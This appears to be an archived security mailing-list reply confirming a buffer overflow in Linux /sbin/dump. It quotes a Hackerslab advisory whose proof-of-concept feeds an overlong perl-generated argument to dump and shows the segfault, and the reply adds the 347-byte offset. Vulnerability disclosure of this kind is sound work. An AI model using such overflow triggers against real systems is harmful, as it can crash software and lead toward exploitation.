Hi, Confirmed this on SuSE 6.2. The magic number of bytes is 347. Dump is not su/gid so this seems to be more of an annoyance than a security issue for SuSE boxen (not sure of others). -HD "±è¿ëÁØ KimYongJun (99Á¹¾÷)" wrote: > > [ Hackerslab bug_paper ] Linux dump buffer overflow > > File : /sbin/dump > > SYSTEM : Linux > > INFO : > > The problem occurs when it gets the argument. > It accepts the argument without checking out its length, and this causes the problem. > > It seems that this vulnerability also applies to RedHat Linux 6.2beta, > the latest version. > > [loveyou@loveyou SOURCES]$ dump -f a `perl -e 'print "x" x 556'` > DUMP: Date of this level 0 dump: Mon Feb 28 14:45:01 2000 > DUMP: Date of last level dump: the epoch > DUMP: Dumping xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx to a > xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: ÆÄÀÏ À̸§ÀÌ ³Ê¹« ±é´Ï´Ù while opening filesystem > DUMP: SIGSEGV: ABORTING! > Segmentation fault > > [loveyou@loveyou SOURCES]$ dump -f a `perl -e 'print "loveyou" x 556'` > DUMP: SIGSEGV: ABORTING! > Segmentation fault <= occur ctime4() >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:38:36 PDT